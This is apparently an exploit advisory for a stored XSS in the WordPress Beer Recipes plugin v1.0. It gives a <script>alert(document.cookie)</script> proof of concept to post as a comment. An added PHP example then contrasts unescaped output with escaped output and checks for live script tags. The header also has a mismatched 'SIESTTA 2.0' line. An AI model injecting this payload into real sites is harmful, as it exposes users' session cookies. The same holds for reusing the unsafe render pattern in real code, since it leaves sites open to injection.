Exploit for wordpress: WordPress Beer Recipes Plugin v.1.0 XSS
# Exploit Title: WordPress - Beer Recipes v.1.0 XSS
# Google Dork: - |
# Date: June / 25 / 2011 |
# Author: TheUzuki.' |
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/ |
# Version: v.1.0 |
# Tested on: Windows 7 |
# CVE : - |
#################################################################### |
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities |
# download: http://opensourcebrew.org/beer-recipes-plugin/ |
# |
# Author: TheUzuki.' from HF |
# mail: uzuki[@]live[dot]de |
# |
# |
# This was written for educational purposes. Use it at your own risk. |
# The author will not be responsible for any damage. |
# |
#################################################################### |
# |
# Notes: You need to be a user on the WordPress board |
# |
#################################################################### |
--Description of WordPress Plugin-- |
Creates a custom post type for easily entering beer recipes into WordPress |
--Exploit-- |
When a beer recipe is commented on with JavaScript, the script gets executed directly. |
This causes an XSS. |
--PoC-- |
<script>alert(document.cookie)</script>
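
--Added example: output escaping--
The following is an added example, not code from the Beer Recipes plugin or from the advisory's author. It shows the unescaped comment output pattern that lets the PoC above run, next to an escaped version; the function names and markup are hypothetical. Inside WordPress, esc_html() (or wp_kses() when limited markup must be allowed) does the escaping shown here with htmlspecialchars().

```php
<?php
// Added example: hypothetical render functions, not taken from the plugin.

// Vulnerable pattern: the stored comment body is echoed into the page as-is,
// so any markup in it (including <script>) becomes part of the document.
function render_comment_unsafe(string $author, string $body): string
{
    return '<div class="comment"><b>' . $author . '</b><p>' . $body . '</p></div>';
}

// Hardened pattern: every user-controlled value is HTML-escaped at output time.
// Inside WordPress, esc_html() serves this purpose for text contexts.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comment_safe(string $author, string $body): string
{
    return '<div class="comment"><b>' . escape_html($author) . '</b><p>'
         . escape_html($body) . '</p></div>';
}

// Regression check a plugin test suite could run: does the rendered output
// still contain a live <script> tag?
function contains_live_script(string $html): bool
{
    return preg_match('/<\s*script\b/i', $html) === 1;
}

// Constructed sample input: the PoC string from this advisory.
$comment = '<script>alert(document.cookie)</script>';

$unsafe = render_comment_unsafe('user', $comment);
$safe   = render_comment_safe('user', $comment);

var_dump(contains_live_script($unsafe)); // live tag reaches the browser
var_dump(contains_live_script($safe));   // tag is rendered as inert text
echo $safe, PHP_EOL;
```

Marking session cookies HttpOnly keeps document.cookie from exposing them, but the injected script still runs, so escaping at output remains the fix.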